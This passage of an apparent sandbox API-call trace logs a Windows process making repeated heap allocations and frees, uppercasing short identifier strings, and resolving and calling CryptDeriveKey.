dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.320] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.320] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.321] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.321] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.321] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.322] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.322] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.322] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.322] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0255.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9d20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.325] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0255.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.326] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 